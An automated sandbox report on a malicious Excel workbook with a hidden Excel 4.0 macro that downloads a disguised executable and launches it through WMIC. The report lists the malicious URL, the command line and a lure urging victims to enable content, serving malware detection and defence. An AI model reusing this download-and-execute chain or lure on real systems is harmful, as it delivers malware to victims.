Play interactive tour

Edit tour

Analysis Report 3F97s4aQjB.xlsx

Overview

General Information

Sample Name:	3F97s4aQjB.xlsx
Analysis ID:	432818
MD5:	1ac719c744d22f42e4978e7b55828435
SHA1:	4ddc7358f615987bf92ed9192430693db65b097c
SHA256:	d9be275feff4b3383821b1483ba93424fb27aa40e138da41a91511193d9538cb
Infos:
Most interesting Screenshot:

Detection

Hidden Macro 4.0

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Document exploit detected (drops PE files)

Multi AV Scanner detection for domain / URL

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Contains functionality to create processes via WMI

Creates processes via WMI

Document exploit detected (UrlDownloadToFile)

Document exploit detected (process start blacklist hit)

Drops PE files to the user root directory

Found abnormal large hidden Excel 4.0 Macro sheet

Machine Learning detection for dropped file

Office process drops PE file

Sigma detected: Microsoft Office Product Spawning Windows Shell

Abnormal high CPU Usage

Allocates a big amount of memory (probably used for heap spraying)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to query network adapater information

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Drops PE files

Drops PE files to the user directory

Drops files with a non-matching file extension (content does not match file extension)

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Sample execution stops while process was sleeping (likely an evasion)

Uses code obfuscation techniques (call, push, ret)

Yara detected Xls With Macro 4.0

Classification

Process Tree

System is w10x64

EXCEL.EXE (PID: 6564 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)

WMIC.exe (PID: 6852 cmdline: wmic process call create 'C:/Users/Public/SettingSyncHost' MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)

conhost.exe (PID: 6860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

SettingSyncHost (PID: 7044 cmdline: C:/Users/Public/SettingSyncHost MD5: 526D56017EF5105277FE0D366C95C39D)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
app.xml	JoeSecurity_XlsWithMacro4	Yara detected Xls With Macro 4.0	Joe Security

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: wmic process call create 'C:/Users/Public/SettingSyncHost', CommandLine: wmic process call create 'C:/Users/Public/SettingSyncHost', CommandLine|base64offset|contains: h, Image: C:\Windows\SysWOW64\wbem\WMIC.exe, NewProcessName: C:\Windows\SysWOW64\wbem\WMIC.exe, OriginalFileName: C:\Windows\SysWOW64\wbem\WMIC.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6564, ProcessCommandLine: wmic process call create 'C:/Users/Public/SettingSyncHost', ProcessId: 6852

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for domain / URL

Show sources

Source: injuryless.com

Virustotal: Detection: 7%

Perma Link

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\logo[1].png	Joe Sandbox ML: detected
Source: C:\Users\Public\SettingSyncHost	Joe Sandbox ML: detected

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 95.142.44.93:443 -> 192.168.2.3:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 193.178.169.243:443 -> 192.168.2.3:49727 version: TLS 1.2

Source:	Binary string: C:\Work\Downloader\Downloader\Release\Downloader.pdb source: SettingSyncHost
Source:	Binary string: C:\Work\Downloader\Downloader\Release\Downloader.pdb5 source: SettingSyncHost, 00000004.00000002.1300907437.0000000000FC8000.00000040.00020000.sdmp

Source: C:\Users\Public\SettingSyncHost

Code function: 4_2_00FCCEB0 FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,FindNextFileA,FindClose,

4_2_00FCCEB0

Software Vulnerabilities:

Document exploit detected (drops PE files)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: logo[1].png.0.dr

Jump to dropped file

Document exploit detected (UrlDownloadToFile)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Section loaded: unknown origin: URLDownloadToFileA

Jump to behavior

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Process created: C:\Windows\SysWOW64\wbem\WMIC.exe

Source: excel.exe

Memory has grown: Private usage: 1MB later: 92MB

Source: global traffic

DNS query: name: pigeonious.com

Source: global traffic

TCP traffic: 192.168.2.3:49724 -> 95.142.44.93:443

Source: global traffic

TCP traffic: 192.168.2.3:49724 -> 95.142.44.93:443

Source: Joe Sandbox View

ASN Name: VDSINA-ASRU VDSINA-ASRU

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown

DNS traffic detected: queries for: pigeonious.com

Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://api.aadrm.com/
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://api.addins.store.office.com/app/query
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://api.cortana.ai
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://api.diagnostics.office.com
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://api.microsoftstream.com/api/
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://api.office.net
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://api.onedrive.com
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://apis.live.net/v5.0/
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://augloop.office.com
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://augloop.office.com/v2
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://cdn.entity.
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://clients.config.office.net/
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://config.edge.skype.com
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://cortana.ai
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://cortana.ai/api
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://cr.office.com
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://dataservice.o365filtering.com
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://dev.cortana.ai
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://devnull.onenote.com
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://directory.services.
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://graph.ppe.windows.net
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://graph.ppe.windows.net/
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://graph.windows.net
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://graph.windows.net/
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://incidents.diagnostics.office.com
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://lifecycle.office.com
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://login.microsoftonline.com/
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://login.windows.local
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://management.azure.com
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://management.azure.com/
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://messaging.office.com/
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://ncus.contentsync.
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://ncus.pagecontentsync.
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://officeapps.live.com
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://onedrive.live.com
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://onedrive.live.com/embed?
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://outlook.office.com/
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://outlook.office365.com/
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://pages.store.office.com/review/query
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: hats.xml	String found in binary or memory: https://pigeonious.com/img/logo.png
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://powerlift.acompli.net
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://settings.outlook.com
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://shell.suite.office.com:1443
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://skyapi.live.net/Activity/
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://staging.cortana.ai
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://store.office.cn/addinstemplate
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://store.office.com/addinstemplate
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://store.office.de/addinstemplate
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://tasks.office.com
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://templatelogging.office.com/client/log
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://web.microsoftstream.com/video/
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://webshell.suite.office.com
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://wus2.contentsync.
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://wus2.pagecontentsync.
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	String found in binary or memory: https://www.odwebp.svc.ms

Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724

Source: unknown	HTTPS traffic detected: 95.142.44.93:443 -> 192.168.2.3:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 193.178.169.243:443 -> 192.168.2.3:49727 version: TLS 1.2

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 8	Screenshot OCR: Enable Editing" and then "Enable Content" button. O O ConMecmal ej 2021 USPS All Rghts O " CD
Source: Screenshot number: 8	Screenshot OCR: Enable Content" button. O O ConMecmal ej 2021 USPS All Rghts O " CD Ready O Type here to sea

Contains functionality to create processes via WMI

Show sources

Source: WMIC.exe, 00000002.00000002.224991249.0000000000700000.00000004.00000020.sdmp

Binary or memory string: C:\Users\user\Documents\C:\Windows\SysWOW64\Wbem\wmic.exewmic process call create 'C:/Users/Public/SettingSyncHost'C:\Windows\System32\Wbem\wmic.exeWinSta0\Default

Found abnormal large hidden Excel 4.0 Macro sheet

Show sources

Source: 3F97s4aQjB.xlsx

Initial sample: Sheet size: 480182

Office process drops PE file

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\Public\SettingSyncHost			Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\logo[1].png			Jump to dropped file

Source: C:\Users\Public\SettingSyncHost

Process Stats: CPU usage > 98%

Source: C:\Users\Public\SettingSyncHost	Code function: 4_2_00FE40F0	4_2_00FE40F0
Source: C:\Users\Public\SettingSyncHost	Code function: 4_2_00F9C8A0	4_2_00F9C8A0
Source: C:\Users\Public\SettingSyncHost	Code function: 4_2_00FF4883	4_2_00FF4883
Source: C:\Users\Public\SettingSyncHost	Code function: 4_2_00FF49A3	4_2_00FF49A3
Source: C:\Users\Public\SettingSyncHost	Code function: 4_2_00FAA133	4_2_00FAA133
Source: C:\Users\Public\SettingSyncHost	Code function: 4_2_00FA8A86	4_2_00FA8A86
Source: C:\Users\Public\SettingSyncHost	Code function: 4_2_00FE7204	4_2_00FE7204
Source: C:\Users\Public\SettingSyncHost	Code function: 4_2_00FA9BB9	4_2_00FA9BB9
